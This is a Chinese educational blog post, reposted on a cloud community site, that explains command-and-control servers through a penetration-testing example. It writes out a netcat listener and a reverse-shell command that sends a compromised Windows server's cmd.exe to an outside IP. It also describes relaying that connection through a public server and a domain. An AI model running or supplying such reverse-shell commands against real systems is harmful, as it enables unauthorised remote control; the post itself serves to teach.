专栏首页信安之路轻松理解什么是 C&C 服务器

轻松理解什么是 C&C 服务器

大家经常在看恶意软件分析的文章或者关于僵尸网络的报道时经常会看到有关 C&C 服务器的字眼,但是这个 C&C 服务器是什么呢?今天的主题就是带领大家轻松理解什么是 C&C 服务器。

C&C 服务器的全称是 Command and Control Server,翻译过来就是命令和控制服务器,那么他有什么用呢?

通常我们在做渗透测试的时候,在拿到一个 webshell 的时候,我们需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令,而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要我们将低权限的 cmd shell 反弹回本地,这里我们使用 nc 在本地执行:

nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接,假设你的电脑 IP 是公网的,并且 IP 为 114.114.114.114,然后在目标服务器就可以执行:

nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回给你,这时你的本机电脑就是一个简易的 C&C 服务器,如图简单的解释上面的过程:

在这里延伸一下,如果你的本机电脑是在内网中,没有公网 IP,目标服务器也在内网,这时目标不能直接通过 IP 地址连接到你本机,我们该如何做呢?

通常这个过程中是必须一个公网的 IP,只有这样内网的服务器才可以访问进行连接,所以我们可以使用一台中转服务器,这台中转服务器有一个公网 IP 地址是:111.111.111.111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器,这里中转服务器的作用就是将我们本地内网的主机监听的端口映射到公网 IP 的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

说到这里,我们再延伸一下,由于 IP 地址是随着中转服务器的变化而变化的,每次 IP 的 变化都会导致整个过程都要重新操作一次,每个命令语句都要进行修改,那么我们有什么办法可以解决这个问题?

当然有,这里就涉及大家经常用到的域名了,将上面语句中的 IP 地址修改为我们注册的域名,然后将域名解析到我们的中转服务器,这样即使我们更换了中转服务器,我们也不需要更改执行过的命令。

以上的整个过程就是一个简易 C&C 服务器的进化史,通常我们在网络上看到的文章说 C&C 服务器的 IP 地址或者域名,这里的 C&C 服务器说的就是上面的中转服务器,为什么是中转服务器而不是本地主机呢?

那是因为中转服务器是恶意软件和僵尸网络的直连服务器,是最直接接触的服务器,通常在恶意软件分析或者僵尸网络分析的时候首先分析出来的,所有控制者发送的指令都是经过中转服务器发送到目标服务器的,今天就说到这里吧,欢迎大家留言讨论。

推荐阅读

我们来聊一聊渗透测试

轻松理解什么是 webshell

轻松理解什么是 SQL 注入

本文分享自微信公众号 - 信安之路(xazlsec),作者:myh0st

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-06-17

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • DNS域传送详解

    DNS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库,目的是为了做冗余备份,防止主服务器...

    信安之路
  • 配置漏洞之DNS域传送

    DNS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库,目的是为了做冗余备份,防止主服务器...

    信安之路
  • http 协议详解

    HTTP 协议,即超文本传输协议 (Hypertext transfer protocol)。 是一种详细规定了浏览器和万维网 (WWW = World Wid...

    信安之路
  • Nginx负载均衡配置实例详解

    负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。

    流柯
  • Nginx负载均衡配置与使用

    现在Nginx到处都可以见到,经常会看到宕机后的网页会显示nginx的字样,这也说明Nginx由于高性能、使用配置简、开源单这些特点被越来越多的用户所接受,所使...

    Java帮帮
  • Java面试手册:J2EE

    8、在weblogic管理制台中对一个应用域(或者说是一个网站,Domain)进行jms及ejb或连接池等相关信息进行配置后,实际保存在什么文件中?

    南风
  • 一次失败的面试,复习一次一致性哈希算法

    本文故事绝对真实,如有雷同,绝对不是巧合! 话说前几天有一次,某大厂的二面。然后呢,烟哥那天刚好有事,所以去不了。于是就约了一场视频面试了!

    乔戈里
  • 复习一次一致性哈希算法

    当时的情形是这样的,先介绍一下自己的项目。然后介绍完项目背景以后,因为有一个登陆模块。于是乎有了如下问题

    JAVA葵花宝典
  • 做网站租用物理服务器好还是云服务器好?

    我们在选择网站服务器的时候,有虚拟主机、VPS、云主机等多种类型可以选择,而且还可以选择服务器租用。但随着云计算的广泛使用,新技术对传统业务托管模式也会...

    青果云小潘
  • redis系列:主从复制

    这篇文章主要讲述Redis的主从复制功能。会依次从环境搭建、功能测试和原理分析几个方面进行介绍。

    云枭

扫码关注云+社区

领取腾讯云代金券